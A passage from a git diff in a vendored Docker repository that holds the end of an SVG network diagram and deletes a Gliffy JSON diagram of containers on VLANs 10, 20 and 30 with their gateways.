y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="62" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="72" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="26">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,259.38636363636374,108.14285409109937)"><g><g transform="translate(0,0) scale(1.7571428571428573,2.3636363636363638)"><g><g><g><path fill="#999999" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,296.65404609475036,143.99656534721677)"><g><g transform="translate(0,0) scale(0.44395492957746485,0.26378466557911767)"><g><path fill="url(#KIKSmddbxdCC)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.2524809014999616,3.790970933828097)"><path fill="none" stroke="none" d="M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#KIKSmddbxdCC)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,300.53252582967696,139.4965653472169)"><g transform="translate(0,0)"><g transform="translate(-303.7573249679898,-143.64485245977795) translate(3.2247991383128465,4.148287112561064) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 305.03252582967696 143.9965653472169 L 305.03252582967696 170.37503190512842" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,328.1147833405815,139.4965653472165)"><g transform="translate(0,0)"><g transform="translate(-333.50230524968,-145.05170400953324) translate(5.387521909098496,5.55513866231675) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 332.6147833405815 143.9965653472165 L 332.6147833405815 170.37503190512865" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,314.3517925736236,139.49656534721677)"><g transform="translate(0,0)"><g transform="translate(-317.5199277848912,-145.05170400953324) translate(3.168135211267611,5.555138662316466) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 318.8517925736236 143.99656534721677 L 318.8517925736236 170.37503190512854" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,267,177)"><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="28" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="12">container3</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="12">vlan30</text></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(24,28) matrix(1,0,0,1,0,0) translate(-24,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="22" y="14" width="61" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="22" y="26">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="36" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="39" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="49" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="56" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="26">16</text></g></g><g transform="matrix(1,0,0,1,67,31)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="41" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="12">30</text></g></g><g transform="matrix(1,0,0,1,5,95)"><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="28" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="14" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="4" y="12">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="12">Host</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy
deleted file mode 100644
index 4d9f2761c4..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy
+++ /dev/null
@@ -1 +0,0 @@
-{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":566,"height":581,"nodeIndex":500,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":-3,"y":-1.0100878848684474},"max":{"x":566,"y":581}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":-5.0,"y":-1.0100878848684474,"rotation":0.0,"id":499,"width":569.0,"height":582.0100878848684,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":103,"lockAspectRatio":false,"lockShape":false,"children":[{"x":374.0,"y":44.510087884868476,"rotation":0.0,"id":497,"width":145.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":101,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">Network &amp;&nbsp;</span></span><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">other </span></span></p><p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">Docker Hosts</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":157.40277777777783,"y":108.18042331083174,"rotation":0.0,"id":492,"width":121.19444444444446,"height":256.03113588084784,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":99,"lockAspectRatio":false,"lockShape":false,"children":[{"x":-126.13675213675185,"y":31.971494223140525,"rotation":180.0,"id":453,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":57,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.4915197649562,-156.36606993796556],[-121.49151976495622,-99.52846483047983],[-229.68596420939843,-99.52846483047591],[-229.68596420939843,-34.22088765589871]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.82598824786317,"y":137.23816896148608,"rotation":180.0,"id":454,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":55,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.05455395299924,191.93174068122784],[291.05455395299924,106.06051735724502],[186.27677617521402,106.06051735724502],[186.27677617521402,69.78655839914467]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":332.0100878848684,"rotation":0.0,"id":490,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":97,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":9.5,"rotation":0.0,"id":365,"width":141.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":98,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">&nbsp;Parent: <span style=\"font-weight:bold;\">eth0.30</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">VLAN: <span style=\"font-weight:bold;\">30</span></span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":342,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":96,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":332.0100878848684,"rotation":0.0,"id":489,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":92,"lockAspectRatio":false,"lockShape":false,"children":[{"x":1.0,"y":10.5,"rotation":0.0,"id":367,"width":138.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":93,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\"><span style=\"\">Parent</span>: <span style=\"font-weight:bold;\">eth0.10</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">VLAN ID</span><span style=\"font-size:18px;font-family:Arial;\">:</span><span style=\"font-size:18px;font-weight:bold;font-family:Arial;\"> <span style=\"\">10</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":340,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":91,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.40277777777794,"y":126.43727235088903,"rotation":0.0,"id":486,"width":121.19444444444446,"height":250.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":88,"lockAspectRatio":false,"lockShape":false,"children":[{"x":236.18596420940128,"y":158.89044937932732,"rotation":0.0,"id":449,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":53,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.49151976495682,-152.05853787273531],[-121.49151976495682,-81.64750068755309],[-229.68596420940125,-81.64750068755139],[-229.68596420940125,-33.27817949077674]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-179.77677617521388,"y":56.523633779319084,"rotation":0.0,"id":450,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":51,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.0545539529992,186.6444547140887],[291.0545539529992,117.79470574474337],[186.276776175214,117.79470574474337],[186.276776175214,67.8640963321146]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":447.0,"y":150.01008788486848,"rotation":0.0,"id":472,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":87,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":473,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":86,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":474,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":84,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":475,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":82,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":101.71008483311067,"rotation":0.0,"id":477,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":80,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\">Gateway&nbsp;</span><span style=\"font-weight:bold;\">10.1.30.1</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;font-weight:bold;\">&nbsp;</span><span style=\"\">&nbsp;and other&nbsp;</span><span style=\"\">containers on the same VLAN/</span><span style=\"\">subnet</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;\">&nbsp;</span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":350.51767083236393,"y":87.47159983339776,"rotation":0.0,"id":478,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":79,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#cc0000","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":94.0,"y":155.01008788486848,"rotation":0.0,"id":463,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":78,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":464,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":77,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":465,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":75,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":466,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":73,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":80.0,"y":109.71008483311067,"rotation":0.0,"id":468,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":71,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\">Gateway&nbsp;</span><span style=\"font-weight:bold;\">10.1.10.1</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;font-weight:bold;\">&nbsp;</span><span style=\"\">&nbsp;and other&nbsp;</span><span style=\"\">containers on the same VLAN/</span><span style=\"\">subnet</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;\">&nbsp;</span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.51767083236396,"y":95.47159983339776,"rotation":0.0,"id":469,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":70,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#38761d","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":341.0,"y":40.010087884868476,"rotation":0.0,"id":460,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":69,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":417,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":68,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":418,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":66,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":419,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":198.51767083236396,"y":41.471599833397754,"rotation":0.0,"id":459,"width":175.20345848455912,"height":79.73848499971291,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":62,"lockAspectRatio":false,"lockShape":false,"children":[{"x":17.482329167636067,"y":14.23848499971291,"rotation":0.0,"id":458,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":61,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\">Gateway&nbsp;</span><span style=\"font-weight:bold;\">10.1.20.1</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;font-weight:bold;\">&nbsp;</span><span style=\"\">&nbsp;and other&nbsp;</span><span style=\"\">containers on the same 